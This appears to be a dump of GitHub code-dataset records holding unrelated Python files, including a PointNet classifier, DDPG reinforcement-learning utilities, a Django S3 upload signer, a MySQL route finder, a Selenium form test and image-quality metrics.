self.format_common_dict(resource_dict)\n res.update(\n {\n 'hosts': self.parse_hosts(resource_dict),\n 'addresses': self.parse_addresses(resource_dict),\n 'default_ports': self.parse_default_ports(resource_dict),\n }\n )\n return res\n","repo_name":"zekai-li/bk-bcs-saas","sub_path":"bcs-app/backend/resources/networks/ingress/formatter.py","file_name":"formatter.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"10525809984","text":"from menu import Menu, MenuItem\nfrom coffee_maker import CoffeeMaker\nfrom money_machine import MoneyMachine\n\ncoffee = CoffeeMaker()\nmoney = MoneyMachine()\nmenu = Menu()\n\nwhile True:\n options = menu.get_items()\n order = input(f\"What would you like? ({options}): \")\n if order == \"stop\":\n break\n \n elif order == \"report\":\n coffee.report()\n money.report()\n\n else:\n drink = menu.find_drink(order)\n if coffee.is_resource_sufficient(drink):\n if money.make_payment(drink.cost):\n coffee.make_coffee(drink)\n","repo_name":"AakashChahal/100DaysOfCode","sub_path":"oop-coffee-machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69895274730","text":"import datetime\nimport numpy as np\nimport tensorflow as tf\nimport trimesh\nimport argparse\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom pathlib import Path\n\n\nclass OrthogonalRegularizer(keras.regularizers.Regularizer):\n def __init__(self, num_features, l2reg=0.001):\n self.num_features = num_features\n self.l2reg = l2reg\n self.eye = tf.eye(num_features)\n\n def __call__(self, x):\n x = tf.reshape(x, (-1, self.num_features, self.num_features))\n xxt = tf.tensordot(x, x, axes=(2, 2))\n xxt = tf.reshape(xxt, (-1, self.num_features, self.num_features))\n return tf.reduce_sum(self.l2reg * tf.square(xxt - self.eye))\n\n def get_config(self):\n return {\n 'num_features': self.num_features,\n 'l2reg': self.l2reg,\n }\n\n @classmethod\n def from_config(cls, config):\n return OrthogonalRegularizer(\n num_features=config['num_features'], l2reg=config['l2reg'])\n\n\ndef conv_bn(x, filters):\n x = layers.Conv1D(filters, kernel_size=1, padding=\"valid\")(x)\n x = layers.BatchNormalization(momentum=0.0)(x)\n return layers.Activation(\"relu\")(x)\n\n\ndef dense_bn(x, filters):\n x = layers.Dense(filters)(x)\n x = layers.BatchNormalization(momentum=0.0)(x)\n return layers.Activation(\"relu\")(x)\n\n\ndef tnet(inputs, num_features):\n\n # Initalise bias as the indentity matrix\n bias = keras.initializers.Constant(np.eye(num_features).flatten())\n reg = OrthogonalRegularizer(num_features)\n\n x = conv_bn(inputs, 32)\n x = conv_bn(x, 64)\n x = conv_bn(x, 512)\n x = layers.GlobalMaxPooling1D()(x)\n x = dense_bn(x, 256)\n x = dense_bn(x, 128)\n x = layers.Dense(\n num_features * num_features,\n kernel_initializer=\"zeros\",\n bias_initializer=bias,\n activity_regularizer=reg,\n )(x)\n feat_T = layers.Reshape((num_features, num_features))(x)\n # Apply affine transformation to input features\n return layers.Dot(axes=(2, 1))([inputs, feat_T])\n\n\ndef get_pointnet_model(num_points=2048):\n inputs = keras.Input(shape=(num_points, 3))\n\n x = tnet(inputs, 3)\n x = conv_bn(x, 32)\n x = conv_bn(x, 32)\n x = tnet(x, 32)\n x = conv_bn(x, 32)\n x = conv_bn(x, 64)\n x = conv_bn(x, 512)\n x = layers.GlobalMaxPooling1D()(x)\n x = dense_bn(x, 256)\n x = layers.Dropout(0.3)(x)\n x = dense_bn(x, 128)\n x = layers.Dropout(0.3)(x)\n\n outputs = layers.Dense(1, activation=\"sigmoid\")(x)\n\n model = keras.Model(inputs=inputs, outputs=outputs, name=\"pointnet\")\n return model\n\n\ndef parse_dataset(files, num_points=2048, test_size=1000):\n rnd = np.random.default_rng(12345)\n rnd.shuffle(files)\n points = []\n labels = []\n\n for file in files:\n labels.append(0 if 'NonChair' in str(file.parent) else 1)\n points.append(trimesh.load(file).sample(num_points))\n\n train_points = points[:-test_size]\n train_labels = labels[:-test_size]\n test_points = points[-test_size:]\n test_labels = labels[-test_size:]\n\n return (\n np.array(train_points),\n np.array(test_points),\n np.array(train_labels),\n np.array(test_labels)\n )\n\n\ndef augment(points, label):\n # jitter points\n points += tf.random.uniform(points.shape, -0.005, 0.005, dtype=tf.float64)\n # shuffle points\n points = tf.random.shuffle(points)\n return points, label\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Run PointNet network')\n parser.add_argument('--dir', type=str, default=None,\n help='Directory of chair voxel files')\n parser.add_argument('--load', type=str, default='pointnet.h5',\n help='Path to load dataset from')\n parser.add_argument('--train', action='store_true', default=False,\n help='Run model in train mode')\n parser.add_argument('--points', type=int, default=2048,\n help='Number of points to sample')\n\n args = parser.parse_args()\n NUM_POINTS = args.points if args.points > 0 else 2048\n BATCH_SIZE = 32\n\n if args.train:\n model = get_pointnet_model(NUM_POINTS)\n\n model.compile(\n loss=\"binary_crossentropy\",\n optimizer=keras.optimizers.Adam(learning_rate=0.0005),\n metrics=[\"acc\"],\n )\n\n files = list(Path(args.dir).glob('**/*.obj'))\n train_points, test_points, train_labels, test_labels = parse_dataset(files, NUM_POINTS)\n np.save('train_points.npy', train_points)\n np.save('test_points.npy', test_points)\n np.save('train_labels.npy', train_labels)\n np.save('test_labels.npy', test_labels)\n # train_points = np.load('train_points.npy')\n # test_points = np.load('test_points.npy')\n # train_labels = np.load('train_labels.npy')\n # test_labels = np.load('test_labels.npy')\n\n train_dataset = tf.data.Dataset.from_tensor_slices((train_points, train_labels))\n test_dataset = tf.data.Dataset.from_tensor_slices((test_points, test_labels))\n\n train_dataset = train_dataset.shuffle(len(train_points)).map(augment).batch(BATCH_SIZE)\n test_dataset = test_dataset.shuffle(len(test_points)).batch(BATCH_SIZE)\n\n # Define callbacks.\n log_dir = \"logs/fit/pointnet\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n tensorboard_cb = keras.callbacks.TensorBoard(\n log_dir=log_dir, histogram_freq=1\n )\n checkpoint_cb = keras.callbacks.ModelCheckpoint(\n \"pointnet.h5\", save_best_only=True\n )\n early_stopping_cb = keras.callbacks.EarlyStopping(\n monitor=\"val_acc\", patience=15\n )\n\n epochs = 100\n model.fit(\n train_dataset,\n validation_data=test_dataset,\n epochs=epochs,\n callbacks=[checkpoint_cb, early_stopping_cb, tensorboard_cb],\n )\n\n else:\n custom_objects = {\"OrthogonalRegularizer\": OrthogonalRegularizer}\n with keras.utils.custom_object_scope(custom_objects):\n model = keras.models.load_model(args.load)\n\n files = list(Path(args.dir).glob('**/*.obj'))\n points = []\n for file in files:\n points.append(trimesh.load(file).sample(NUM_POINTS))\n\n points = np.array(points)\n result = model.predict(points)\n for i, file in enumerate(files):\n print(\"{}: {:.3f}%\".format(file, result[i][0] * 100))\n","repo_name":"allantsai3/chairy","sub_path":"scorer/pointnet.py","file_name":"pointnet.py","file_ext":"py","file_size_in_byte":6462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"968576130","text":"import os\nimport boto3\nfrom django.views import View\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, reverse, redirect\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\n\nclass SignS3View(LoginRequiredMixin, View):\n def get(self, request):\n S3_BUCKET_NAME = os.environ.get('S3_BUCKET_NAME')\n\n file_name = request.GET.get('file_name')\n file_type = request.GET.get('file_type')\n\n s3_client = boto3.client('s3')\n\n presigned_post = s3_client.generate_presigned_post(\n Bucket=S3_BUCKET_NAME,\n Key=file_name,\n Fields={\"acl\": \"public-read\", \"Content-Type\": file_type},\n Conditions=[\n {\"acl\": \"public-read\"},\n {\"Content-Type\": file_type}\n ],\n ExpiresIn=3600\n )\n\n return JsonResponse({\n 'data': presigned_post,\n 'url': 'https://%s.s3.amazonaws.com/%s' % (S3_BUCKET_NAME, file_name)\n })\n","repo_name":"jcquinlan/colophon","sub_path":"core/views/s3/sign_s3.py","file_name":"sign_s3.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29270076932","text":"import mysql.connector\nfrom collections import deque\nimport math\nfrom random import randint\n\nclass MapWay:\n\n def __init__(self):\n self.mydb = mysql.connector.connect(\n host='std-mysql',\n user='std_1455_map_way',\n passwd='12345678',\n database='std_1455_map_way'\n )\n\n def findBestWay(self,\n points=None):\n start_point = points[0]\n end_point = points[1]\n ans = [points[0]]\n\n places_in_zone = self.inZone(first_point=start_point, second_point=end_point)\n start_point.category, end_point.category = 'Start_point', 'End_point'\n places_in_zone.append(start_point)\n places_in_zone.append(end_point)\n self.matrix_size_x = len(places_in_zone)\n matrix_places = [[math.inf] * self.matrix_size_x for _ in range(self.matrix_size_x)]\n\n for i in range(self.matrix_size_x):\n for _ in range(4):\n rnd_num = randint(0, self.matrix_size_x - 1)\n if (((places_in_zone[i].category == 'Start_point' and places_in_zone[rnd_num] == 'End_point') or\n (places_in_zone[i].category == 'End_point' and places_in_zone[rnd_num] == 'Start_point')) and\n self.matrix_size_x > 2):\n matrix_places[i][rnd_num] = math.inf\n else:\n matrix_places[i][rnd_num] = self.getLength(places_in_zone[i], places_in_zone[rnd_num])\n\n '''\n\n S\n \\\n \\\n \\\n *-------E\n\n Буду использовать алгоритм дейкстры для поиска пути, но буду так же искать по точке,\n которая больше всего нравится пользователю и по времени до конца\n '''\n\n start_point = len(matrix_places) - len(points)\n end_point = len(matrix_places) - 1\n dist = [math.inf] * len(matrix_places)\n way = [0] * len(matrix_places)\n way[start_point] = 0\n dist[0] = 0\n Q = deque()\n Q.append(len(places_in_zone) - len(points))\n while Q:\n v = Q.pop()\n for u in range(len(matrix_places[v])):\n if (dist[u] > dist[v] + matrix_places[v][u]):\n dist[u] = dist[v] + matrix_places[v][u]\n way[u] = v\n Q.append(u)\n\n '''\n\n Чтобы восстановить оптимальный путь от\n начальной вершины до коненой нам нужно просто смотреть на массив\n в котором у нас записаны минимальные расстояния до начальной вершины\n Мы будем жадно брать самое маленькое значение\n\n '''\n\n road = [end_point]\n now_point = end_point\n while way[now_point] != now_point:\n now_point = way[end_point]\n road.append(now_point)\n\n for i in list(reversed(road)):\n ans.append(places_in_zone[i])\n\n return ans;\n\n def inZone(self,\n first_point=None,\n second_point=None):\n '''\n TODO: добавить функцию просмотра в окружении на точках, для захвата большего количества возможных мест\n\n y y\n ^ ^\n X---------------------- --------------------Y\n | * | | * | *\n | | * * | * |\n | * * | | |\n | | | * |\n * | | | |\n | * * | * | | *\n | | * | * |\n * ----------------------Y > x X-------------------- > x\n\n '''\n\n if first_point.longitude <= second_point.longitude: #\n left_point = first_point\n right_point = second_point\n else:\n left_point = second_point\n right_point = first_point\n\n\n query = f'SELECT * FROM Place WHERE ({left_point.latitude} >= {right_point.latitude} and (Place.longitude <= ' \\\n f'{right_point.longitude} and (Place.longitude >= {left_point.longitude} and Place.latitude <= ' \\\n f'{left_point.latitude} and Place.latitude >= {right_point.latitude})) or ({left_point.latitude} < ' \\\n f'{right_point.latitude} and (Place.longitude <= {right_point.longitude} and Place.longitude >= ' \\\n f'{left_point.longitude} and Place.latitude <= {right_point.latitude} and Place.latitude >= ' \\\n f'{left_point.latitude})));'\n mycursor = self.mydb.cursor()\n mycursor.execute(query)\n places = mycursor.fetchall()\n places_in_zone = []\n for x in places:\n place = Place(id=x[0], name=x[1], category=x[2], latitude=x[3], longitude=x[4])\n places_in_zone.append(place)\n\n return places_in_zone\n\n def getLength(self, first_point, second_point):\n '''\n :param first_point:\n :param second_point:\n Брать\n :return:\n '''\n import math\n return math.sqrt((first_point.latitude - second_point.latitude) ** 2 +\n (first_point.longitude - second_point.longitude) ** 2)\n\nclass Place:\n\n def __init__(self, id=None, name=None, category=None, longitude=None, latitude=None):\n self.id = id\n self.name = name\n self.category = category\n self.longitude = longitude\n self.latitude = latitude\n","repo_name":"HehexOne/MapWay","sub_path":"Algos and notebooks/newMapWay.py","file_name":"newMapWay.py","file_ext":"py","file_size_in_byte":6113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9072784856","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nimport time\r\n\r\nclass webForm:\r\n def test(self):\r\n base_url = \"https://www.ultimateqa.com/filling-out-forms/\"\r\n driver = webdriver.Chrome()\r\n driver.maximize_window()\r\n driver.get(base_url)\r\n driver.implicitly_wait(5)\r\n\r\n driver.find_element(By.ID, \"et_pb_contact_name_1\").send_keys(\"Second name field\")\r\n driver.find_element(By.ID, \"et_pb_contact_message_1\").send_keys(\"Second message text-box field\")\r\n\r\n # Reading captcha details below\r\n x = driver.find_element(By.XPATH, \"//input[@name='et_pb_contact_captcha_1']\").get_attribute(\"data-first_digit\")\r\n y = driver.find_element(By.XPATH, \"//input[@name='et_pb_contact_captcha_1']\").get_attribute(\"data-second_digit\")\r\n captureSum = str(int(x) + int(y))\r\n\r\n driver.find_element(By.XPATH, \"//input[@name='et_pb_contact_captcha_1']\").send_keys(captureSum)\r\n buttons = driver.find_elements_by_class_name(\"et_pb_contact_submit\")[1].click()\r\n\r\n # checking for the success message and print to console\r\n uiResponse = driver.find_element_by_css_selector(\"[class='et-pb-contact-message'] > p \")\r\n message = uiResponse.text\r\n print(message)\r\n time.sleep(10)\r\n\r\nif __name__ == '__main__':\r\n wf = webForm()\r\n wf.test()","repo_name":"ellogutu/qa_tests","sub_path":"ui_automation_test.py","file_name":"ui_automation_test.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36792866373","text":"# Set a random seed for reproducibility\ns = 2\n# Set pseudo-random generator seeds in Python, NumPy, and TensorFlow\nimport random\nrandom.seed(s)\nimport numpy as np\nnp.random.seed(s)\nimport tensorflow as tf\ntf.random.set_seed(s)\n\nfrom tensorflow.keras import layers\nfrom typing import Union\n\nclass OUActionNoise:\n \"\"\"\n Ornstein-Uhlenbeck correlated noise. Heavily based on Hemant Singh's implementation of DDPG\n in Keras: https://keras.io/examples/rl/ddpg_pendulum/\n \"\"\"\n def __init__(self, mean: float, std_deviation: float, theta: float=0.15, \n dt: float=1e-2, x_initial: Union[np.ndarray, list, None]=None):\n # Set noise amplitude\n self.theta = theta\n # Set noise mean\n self.mean = mean\n # Set noise standard deviation\n self.std_dev = std_deviation\n # Set noise time step\n self.dt = dt\n # Set initial state\n self.x_initial = x_initial\n # Reset the noise object\n self.reset()\n\n def __call__(self) -> Union[np.ndarray, list]:\n \"\"\"\n Determine the noise signal when calling an instance of this class.\n Based on Hemant Singh's implementation of DDPG in Keras: \n https://keras.io/examples/rl/ddpg_pendulum/ and on the discretization of\n the Ornstein-Uhlenbeck process described in:\n https://math.stackexchange.com/questions/1287634/implementing-ornstein-uhlenbeck-in-matlab\n Returns:\n Union[np.ndarray, list]: Correlated noise signal\n \"\"\"\n x = (\n self.x_prev\n + self.theta * (self.mean - self.x_prev) * self.dt\n + self.std_dev * np.sqrt(self.dt) * np.random.normal(size=self.mean.shape, scale=self.std_dev)\n )\n\n # Store previous noise signal for later use\n self.x_prev = x\n\n return x\n\n def reset(self):\n \"\"\"\n Reset the noise object\n \"\"\"\n if self.x_initial is not None:\n self.x_prev = self.x_initial\n else:\n self.x_prev = np.zeros_like(self.mean)\n\nclass Buffer:\n \"\"\"\n Replay buffer from which to draw experiences and learn both the critic function \n and the actor policy.\n Heavily based on Hemant Singh's implementation of DDPG\n in Keras: https://keras.io/examples/rl/ddpg_pendulum/\n\n \"\"\"\n def __init__(self, num_states: int, num_actions: int, \n buffer_capacity: int=100000, batch_size: int=64):\n \"\"\"\n Initialize instance of the Buffer class\n\n Args:\n num_states (int): Dimension of state space\n num_actions (int): Dimension of action space\n buffer_capacity (int, optional): Maximum number of transitions to store. Defaults to 100000.\n batch_size (int, optional): Size of the training mini-batches. Defaults to 64.\n \"\"\"\n # Maximum number of transitions to store\n self.buffer_capacity = buffer_capacity\n # Size of the training mini-batch\n self.batch_size = batch_size\n\n # Count the number of records (can exceed self.buffer_capacity)\n self.buffer_counter = 0\n\n # Create one buffer per element in the (s, a, r, s') transition\n self.state_buffer = np.zeros((self.buffer_capacity, num_states))\n self.action_buffer = np.zeros((self.buffer_capacity, num_actions))\n self.reward_buffer = np.zeros((self.buffer_capacity, 1))\n self.next_state_buffer = np.zeros((self.buffer_capacity, num_states))\n\n def record(self, obs_tuple: tuple):\n \"\"\"\n Save a (s, a, r, s') transition to the buffer\n\n Args:\n obs_tuple (tuple): (s, a, r, s') transition\n \"\"\"\n\n # Create an index to replace either the oldest record or \n # a random record with 0.8 and 0.2 probability, respectively\n if self.buffer_counter == 0:\n index = 0\n else:\n index = np.random.choice([self.buffer_counter % self.buffer_capacity, np.random.randint(0, min(self.buffer_counter, self.buffer_capacity))], p=[0.8, 0.2])\n\n # Store the components of the tuple in their respective buffers\n self.state_buffer[index] = obs_tuple[0]\n self.action_buffer[index] = obs_tuple[1]\n self.reward_buffer[index] = obs_tuple[2]\n self.next_state_buffer[index] = obs_tuple[3]\n\n # Add to the buffer counter\n self.buffer_counter += 1\n\n @tf.function\n def update(\n self, gamma: float, target_actor: tf.keras.Model, target_critic: tf.keras.Model,\n critic_model: tf.keras.Model, critic_optimizer: tf.keras.optimizers.Optimizer,\n actor_model: tf.keras.Model, actor_optimizer: tf.keras.optimizers.Optimizer, \n state_batch: tf.Tensor, action_batch: tf.Tensor, reward_batch: tf.Tensor, next_state_batch: tf.Tensor\n ):\n \"\"\"\n Update actor and critic networks' weights according to the DDPG algorithm\n Args:\n gamma (float): Discount rate for future rewards\n target_actor (tf.keras.Model): Target actor network\n target_critic (tf.keras.Model): Target critic network\n critic_model (tf.keras.Model): Main critic network\n critic_optimizer (tf.keras.optimizers.Optimizer): Optimizer for the critic network\n actor_model (tf.keras.Model): Main actor network\n actor_optimizer (tf.keras.optimizers.Optimizer): Optimizer for the actor network\n state_batch (tf.Tensor): Mini-batch of states\n action_batch (tf.Tensor): Mini-batch of actions\n reward_batch (tf.Tensor): Mini-batch of rewards\n next_state_batch (tf.Tensor): Mini-batch of next states\n \"\"\"\n # Track operations for automatic differentiation\n with tf.GradientTape() as tape:\n # Find the actions taken by the target actor\n target_actions = target_actor(next_state_batch, training=True)\n # Calculate the y term from the DDPG algorithm\n y = reward_batch + gamma * target_critic(\n [next_state_batch, target_actions], training=True\n )\n # Calculate the main critic's values assigned to the target's chosen actions\n critic_value = critic_model([state_batch, action_batch], training=True)\n # Calculate the critic loss from the DDPG algorithm\n critic_loss = tf.math.reduce_mean(tf.math.square(y - critic_value))\n\n # Take the gradient of the critic loss\n critic_grad = tape.gradient(critic_loss, critic_model.trainable_variables)\n # Clip the gradient to avoid exploding gradients\n critic_grad, _ = tf.clip_by_global_norm(critic_grad, 5.0)\n # Apply the gradients to the critic optimizer\n critic_optimizer.apply_gradients(\n zip(critic_grad, critic_model.trainable_variables)\n )\n\n with tf.GradientTape() as tape:\n # Get the actions chosen by the actor given the mini-batch of states\n actions = actor_model(state_batch, training=True)\n # Get the critic's value of the states and actor's chosen actions\n critic_value = critic_model([state_batch, actions], training=True)\n # The aim when training the actor is to maximize the critic's value, \n # which is equivalent to minimizing its negative\n actor_loss = -tf.math.reduce_mean(critic_value)\n\n # Take the gradient of the actor loss\n actor_grad = tape.gradient(actor_loss, actor_model.trainable_variables)\n # Clip the gradient to avoid exploding gradients\n actor_grad, _ = tf.clip_by_global_norm(actor_grad, 5.0)\n # Apply the gradients to the actor optimizer\n actor_optimizer.apply_gradients(\n zip(actor_grad, actor_model.trainable_variables)\n )\n\n def learn(self, gamma: float, target_actor: tf.keras.Model, \n target_critic: tf.keras.Model, critic_model: tf.keras.Model,\n critic_optimizer: tf.keras.optimizers.Optimizer,\n actor_model: tf.keras.Model, \n actor_optimizer: tf.keras.optimizers.Optimizer):\n \"\"\"\n Carry out offline learning from the replay buffer\n\n Args:\n gamma (float): Discount rate for future rewards\n target_actor (tf.keras.Model): Target actor model\n target_critic (tf.keras.Model): Target critic model\n critic_model (tf.keras.Model): Main critic model\n critic_optimizer (tf.keras.optimizers.Optimizer): Optimizer for the critic model\n actor_model (tf.keras.Model): Main actor model\n actor_optimizer (tf.keras.optimizers.Optimizer): Optimizer for the actor model\n \"\"\"\n # Get sampling range\n record_range = min(self.buffer_counter, self.buffer_capacity)\n # Draw a random set of indices to form the minibatches\n batch_indices = np.random.choice(record_range, self.batch_size)\n\n # Convert minibatches to tensors\n state_batch = tf.convert_to_tensor(self.state_buffer[batch_indices])\n action_batch = tf.convert_to_tensor(self.action_buffer[batch_indices])\n reward_batch = tf.convert_to_tensor(self.reward_buffer[batch_indices])\n reward_batch = tf.cast(reward_batch, dtype=tf.float32)\n next_state_batch = tf.convert_to_tensor(self.next_state_buffer[batch_indices])\n\n # Update main critic and actor networks' weights\n self.update(gamma, target_actor, target_critic,\n critic_model, critic_optimizer,\n actor_model, actor_optimizer, state_batch, action_batch, reward_batch, next_state_batch)\n\n\n@tf.function\ndef update_target(target_weights: list, weights: list, tau: float):\n \"\"\"\n Update the target networks with an update rate tau.\n Taken from Hemant Singh's implementation of DDPG\n in Keras: https://keras.io/examples/rl/ddpg_pendulum/\n\n Args:\n target_weights (list): List of target network's weights\n weights (list): List of main network's weights\n tau (float): Update rate (<< 1)\n \"\"\"\n for (a, b) in zip(target_weights, weights):\n # Update the weights \n a.assign(b*tau + a*(1 - tau))\n\ndef get_actor(num_states: int, num_actions: int, upper_bound: float) -> tf.keras.Model:\n \"\"\"\n Create an actor neural network. Heavily based on Hemant Singh's implementation of DDPG\n in Keras: https://keras.io/examples/rl/ddpg_pendulum/\n\n Args:\n num_states (int): Dimension of the state space\n num_actions (int): Dimension of the action space\n upper_bound (float): Upper bound of the actions (actions are assumed symmetrical around 0)\n\n Returns:\n tf.keras.Model: Actor neural network\n \"\"\"\n # Initialize weights between -3e-3 and 3-e3 to make sure gradients do not go to zero in first steps\n last_init = tf.random_uniform_initializer(minval=-3e-3, maxval=3e-3)\n\n # Take the state as input\n inputs = layers.Input(shape=(num_states,), name='State')\n # Add two dense, ReLU-activated layers \n out = layers.Dense(256, activation=\"relu\", name='Hidden_1')(inputs)\n out = layers.Dense(256, activation=\"relu\", name='Hidden_2')(out)\n # Add a layer that gives the action (normalized between -1 and 1)\n outputs = layers.Dense(num_actions, activation=\"tanh\", kernel_initializer=last_init, name='Normalized_action')(out)\n\n # De-normalize the action with the upper bound of the action space\n outputs = outputs * upper_bound\n # Create and return the full model\n model = tf.keras.Model(inputs, outputs)\n return model\n\n\ndef get_critic(num_states: int, num_actions: int) -> tf.keras.Model:\n \"\"\"\n Create a critic neural network. Heavily based on Hemant Singh's implementation of DDPG\n in Keras: https://keras.io/examples/rl/ddpg_pendulum/\n\n Args:\n num_states (int): Dimension of the state space\n num_actions (int): Dimension of the action space\n\n Returns:\n tf.keras.Model: Critic neural network\n \"\"\"\n # Take the state as an input\n state_input = layers.Input(shape=(num_states), name='State')\n # Add three dense, ReLU-activated layers\n state_out = layers.Dense(16, activation=\"relu\", name='Hidden_1')(state_input)\n state_out = layers.Dense(16, activation=\"relu\", name='Hidden_2')(state_out)\n state_out = layers.Dense(32, activation=\"relu\", name='Hidden_3')(state_out)\n\n # Take the action as an input\n action_input = layers.Input(shape=(num_actions), name='Action')\n # Add two dense, ReLU-activated layers\n action_out = layers.Dense(32, activation=\"relu\", name='Hidden_4')(action_input)\n action_out = layers.Dense(32, activation=\"relu\", name='Hidden_5')(action_out)\n\n # Concatenate the state and action 'branches'\n concat = layers.Concatenate(name='Concatenate')([state_out, action_out])\n\n # Add two fully connected, ReLU-activated layers\n out = layers.Dense(256, activation=\"relu\", name='Hidden_6')(concat)\n out = layers.Dense(256, activation=\"relu\", name='Hidden_7')(out)\n # Give the Q value of the state, action pair as output\n outputs = layers.Dense(1, name='Q_value')(out)\n\n # Create and return the full model\n model = tf.keras.Model([state_input, action_input], outputs)\n\n return model\n\ndef policy(state: tf.Tensor, actor_model: tf.keras.Model,\n noise_object: OUActionNoise, add_noise: bool=True, \n lower_bound: float=-np.pi/2, upper_bound: float=np.pi/2) -> np.ndarray:\n \"\"\"\n Policy function that add optionally adds noise to the actor model's chosen action\n Heavily based on Hemant Singh's implementation of DDPG\n in Keras: https://keras.io/examples/rl/ddpg_pendulum/\n\n Args:\n state (tf.Tensor): Current state (has to be a tf.Tensor)\n actor_model (tf.keras.Model): Actor model that maps actions to states\n noise_object (OUActionNoise): Correlated noise object\n add_noise (bool, optional): Whether to add noise to the policy. Defaults to True.\n lower_bound (float, optional): Lower bound for clipping. Defaults to -np.pi/2.\n upper_bound (float, optional): Upper bound for clipping. Defaults to np.pi/2.\n\n Returns:\n np.ndarray: Chosen action given the input state\n \"\"\"\n # Get action out of the current state\n sampled_actions = tf.squeeze(actor_model(state))\n # Call the noise object to get the noise signal\n noise = noise_object()\n # Optionally add the noise to the selected action\n if add_noise:\n sampled_actions = sampled_actions.numpy() + noise\n else:\n sampled_actions = sampled_actions.numpy()\n\n # Clip the action to make it fit within the specified bounds\n legal_action = np.clip(sampled_actions, lower_bound, upper_bound)\n\n return np.squeeze(legal_action)","repo_name":"santiagvalencia/ddpg_helicopter","sub_path":"training_utils.py","file_name":"training_utils.py","file_ext":"py","file_size_in_byte":14707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32168035413","text":"import math\nimport numpy as np\nimport mmcv\nfrom .ssim import structural_similarity\n\nSSIM = structural_similarity\n\ndef PSNR(x, gt, maxval=255, shave_border=0):\n x = x.astype(np.float)\n gt = gt.astype(np.float)\n height, width = x.shape[:2]\n x = x[shave_border:height - shave_border, shave_border:width - shave_border]\n gt = gt[shave_border:height - shave_border, shave_border:width - shave_border]\n diff = x - gt\n RMSE = math.sqrt(np.mean(diff ** 2))\n if RMSE == 0:\n return 100\n return 20 * math.log10(maxval / RMSE)\n\n\ndef PSNR_B(x, gt, blockSize=8, maxval=255):\n x = x.astype(np.float)\n gt = gt.astype(np.float)\n height, width = x.shape[:2]\n\n B = blockSize # block size\n Nh = width\n Nv = height\n \n Nhb = Nv * (Nh/B - 1)\n Nvb = Nh * (Nv/B - 1)\n Nhbc = Nv * (Nh - 1) - Nhb\n Nvbc = Nh * (Nv - 1) - Nvb\n\n Idx_H = range(1, Nh)\n Idx_Hb = range(B, Nh, B)\n Idx_Hbc = np.setxor1d(Idx_H, Idx_Hb)\n Idx_V = range(1, Nv)\n Idx_Vb = range(B, Nv, B)\n Idx_Vbc = np.setxor1d(Idx_V, Idx_Vb)\n\n Db = 0\n Dbc = 0\n for i in Idx_Hb:\n Db += np.sum(np.power(x[:,i-1,...] - x[:,i,...], 2))\n for i in Idx_Vb:\n Db += np.sum(np.power(x[i-1,:,...] - x[i,:,...], 2))\n for i in Idx_Hbc:\n Dbc += np.sum(np.power(x[:,i-1,...] - x[:,i,...], 2))\n for i in Idx_Vbc:\n Dbc += np.sum(np.power(x[i-1,:,...] - x[i,:,...], 2))\n Db = Db / (Nhb + Nvb)\n Dbc = Dbc / (Nhbc + Nvbc)\n\n eta = np.log2(B) / np.log2(np.minimum(Nh, Nv)) if Db > Dbc else 0\n BEF = eta * (Db - Dbc)\n\n MSE = np.mean((x - gt) ** 2)\n MSE_B = MSE + BEF\n PSNR_B = 10 * np.log10(maxval**2 / MSE_B)\n return PSNR_B\n\n\ndef psnr_mmcv(img1, img2, crop_border=0, input_order='HWC', convert_to=None):\n assert img1.shape == img2.shape, (\n f'Image shapes are differnet: {img1.shape}, {img2.shape}.')\n if input_order not in ['HWC', 'CHW']:\n raise ValueError(\n f'Wrong input_order {input_order}. Supported input_orders are '\n '\"HWC\" and \"CHW\"')\n\n img1, img2 = img1.astype(np.float32), img2.astype(np.float32)\n if isinstance(convert_to, str) and convert_to.lower() == 'y':\n img1 = mmcv.bgr2ycbcr(img1 / 255., y_only=True) * 255.\n img2 = mmcv.bgr2ycbcr(img2 / 255., y_only=True) * 255.\n elif convert_to is not None:\n raise ValueError('Wrong color model. Supported values are '\n '\"Y\" and None.')\n\n if crop_border != 0:\n img1 = img1[crop_border:-crop_border, crop_border:-crop_border, None]\n img2 = img2[crop_border:-crop_border, crop_border:-crop_border, None]\n\n mse_value = np.mean((img1 - img2)**2)\n if mse_value == 0:\n return float('inf')\n return 20. * np.log10(255. / np.sqrt(mse_value))\n","repo_name":"ACALJJ32/Compressed_Image","sub_path":"src/utils/util_metric.py","file_name":"util_metric.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11829502237","text":"import sys\nimport logging\nfrom joblib import dump\n\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.pipeline import Pipeline\nfrom string import Template\nimport yaml\n\n\ndef get_config():\n with open(r\"config.yml\") as file:\n config = yaml.safe_load(file)\n return config\n\n\ndef build_logger(name):\n logging.basicConfig(\n format=\"%(asctime)s %(levelname)s:%(name)s: %(message)s\",\n level=logging.INFO,\n datefmt=\"%H:%M:%S\",\n stream=sys.stderr,\n )\n logger = logging.getLogger(name)\n return logger\n\n\ndef update_model(model: Pipeline) -> None:\n \"\"\"Updates a model file.\n\n Args:\n model (Pipeline): a model to save.\n \"\"\"\n config = get_config()\n dump(model, config[\"path\"][\"model\"])\n\n\ndef save_simple_metrics_report(\n train_score: float, test_score: float, validation_score: float, model: Pipeline\n) -> None:\n config = get_config()\n with 